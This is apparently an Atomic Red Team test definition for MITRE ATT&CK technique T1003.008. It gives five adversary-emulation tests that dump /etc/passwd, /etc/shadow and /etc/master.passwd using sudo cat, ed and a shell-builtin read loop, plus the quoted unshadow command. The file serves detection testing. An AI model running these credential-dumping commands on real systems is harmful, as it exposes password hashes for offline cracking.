atomic-red-team/atomics/T1003.008/T1003.008.md

# T1003.008 - OS Credential Dumping: /etc/passwd, /etc/master.passwd and /etc/shadow
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1003/008)
<blockquote>

Adversaries may attempt to dump the contents of <code>/etc/passwd</code> and <code>/etc/shadow</code> to enable offline password cracking. Most modern Linux operating systems use a combination of <code>/etc/passwd</code> and <code>/etc/shadow</code> to store user account information, including password hashes in <code>/etc/shadow</code>. By default, <code>/etc/shadow</code> is only readable by the root user.(Citation: Linux Password and Shadow File Formats)

Linux stores user information such as user ID, group ID, home directory path, and login shell in <code>/etc/passwd</code>. A "user" on the system may belong to a person or a service. All password hashes are stored in <code>/etc/shadow</code> - including entries for users with no passwords and users with locked or disabled accounts.(Citation: Linux Password and Shadow File Formats)

Adversaries may attempt to read or dump the <code>/etc/passwd</code> and <code>/etc/shadow</code> files on Linux systems via command line utilities such as the <code>cat</code> command.(Citation: Arctic Wolf) Additionally, the Linux utility <code>unshadow</code> can be used to combine the two files in a format suited for password cracking utilities such as John the Ripper - for example, via the command <code>/usr/bin/unshadow /etc/passwd /etc/shadow > /tmp/crack.password.db</code>(Citation: nixCraft - John the Ripper). Since the user information stored in <code>/etc/passwd</code> are linked to the password hashes in <code>/etc/shadow</code>, an adversary would need to have access to both.

</blockquote>

## Atomic Tests

- [Atomic Test #1 - Access /etc/shadow (Local)](#atomic-test-1---access-etcshadow-local)

- [Atomic Test #2 - Access /etc/master.passwd (Local)](#atomic-test-2---access-etcmasterpasswd-local)

- [Atomic Test #3 - Access /etc/passwd (Local)](#atomic-test-3---access-etcpasswd-local)

- [Atomic Test #4 - Access /etc/{shadow,passwd,master.passwd} with a standard bin that's not cat](#atomic-test-4---access-etcshadowpasswdmasterpasswd-with-a-standard-bin-thats-not-cat)

- [Atomic Test #5 - Access /etc/{shadow,passwd,master.passwd} with shell builtins](#atomic-test-5---access-etcshadowpasswdmasterpasswd-with-shell-builtins)


<br/>

## Atomic Test #1 - Access /etc/shadow (Local)
/etc/shadow file is accessed in Linux environments

**Supported Platforms:** Linux


**auto_generated_guid:** 3723ab77-c546-403c-8fb4-bb577033b235





#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| output_file | Path where captured results will be placed | path | /tmp/T1003.008.txt|


#### Attack Commands: Run with `bash`!  Elevation Required (e.g. root or admin) 


```bash
sudo cat /etc/shadow > #{output_file}
cat #{output_file}
```

#### Cleanup Commands:
```bash
rm -f #{output_file}
```





<br/>
<br/>

## Atomic Test #2 - Access /etc/master.passwd (Local)
/etc/master.passwd file is accessed in FreeBSD environments

**Supported Platforms:** Linux


**auto_generated_guid:** 5076874f-a8e6-4077-8ace-9e5ab54114a5





#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| output_file | Path where captured results will be placed | path | /tmp/T1003.008.txt|


#### Attack Commands: Run with `sh`!  Elevation Required (e.g. root or admin) 


```sh
sudo cat /etc/master.passwd > #{output_file}
cat #{output_file}
```

#### Cleanup Commands:
```sh
rm -f #{output_file}
```





<br/>
<br/>

## Atomic Test #3 - Access /etc/passwd (Local)
/etc/passwd file is accessed in FreeBSD and Linux environments

**Supported Platforms:** Linux


**auto_generated_guid:** 60e860b6-8ae6-49db-ad07-5e73edd88f5d





#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| output_file | Path where captured results will be placed | path | /tmp/T1003.008.txt|


#### Attack Commands: Run with `sh`! 


```sh
cat /etc/passwd > #{output_file}
cat #{output_file}
```

#### Cleanup Commands:
```sh
rm -f #{output_file}
```





<br/>
<br/>

## Atomic Test #4 - Access /etc/{shadow,passwd,master.passwd} with a standard bin that's not cat
Dump /etc/passwd, /etc/master.passwd and /etc/shadow using ed

**Supported Platforms:** Linux


**auto_generated_guid:** df1a55ae-019d-4120-bc35-94f4bc5c4b0a





#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| output_file | Path where captured results will be placed | path | /tmp/T1003.008.txt|


#### Attack Commands: Run with `sh`!  Elevation Required (e.g. root or admin) 


```sh
unamestr=$(uname)
if [ "$unamestr" = 'Linux' ]; then echo -e "e /etc/passwd\n,p\ne /etc/shadow\n,p\n" | ed > #{output_file}; elif [ "$unamestr" = 'FreeBSD' ]; then echo -e "e /etc/passwd\n,p\ne /etc/master.passwd\n,p\ne /etc/shadow\n,p\n" | ed > #{output_file}; fi
```

#### Cleanup Commands:
```sh
rm -f #{output_file}
```





<br/>
<br/>

## Atomic Test #5 - Access /etc/{shadow,passwd,master.passwd} with shell builtins
Dump /etc/passwd, /etc/master.passwd and /etc/shadow using sh builtins

**Supported Platforms:** Linux


**auto_generated_guid:** f5aa6543-6cb2-4fae-b9c2-b96e14721713





#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| output_file | Path where captured results will be placed | path | /tmp/T1003.008.txt|


#### Attack Commands: Run with `sh`!  Elevation Required (e.g. root or admin) 


```sh
testcat(){ (while read line; do echo $line >> #{output_file}; done < $1) }
[ "$(uname)" = 'FreeBSD' ] && testcat /etc/master.passwd
testcat /etc/passwd
testcat /etc/shadow
```

#### Cleanup Commands:
```sh
rm -f #{output_file}
```





<br/>